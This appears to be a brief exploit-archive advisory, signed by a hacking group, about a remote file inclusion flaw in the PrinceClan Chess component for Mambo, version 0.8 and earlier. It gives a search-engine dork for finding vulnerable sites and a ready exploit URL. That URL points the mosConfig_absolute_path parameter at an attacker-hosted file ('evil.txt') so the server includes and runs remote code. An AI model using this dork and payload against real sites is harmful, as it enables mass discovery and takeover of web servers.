PrinceClan Chess Mambo Com versions 0.8 and below suffer from a remote file inclusion flaw.
ad0f4e40857b67ad87c1333fe88ee03eBy:Tr_ZiNDaN
email: tr_zindan@wolfsecurity.org
Url: http://www.hack-ezine.org
Greetz:EL_MuHaMMeD,CyberWolf,By_MaCRo And ALL WolFSecurityTeam USer
dor:inurl:com_pcchess
Exploit:
http://[host.com]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://evil.txt?
Comments
No comments yet, be the first!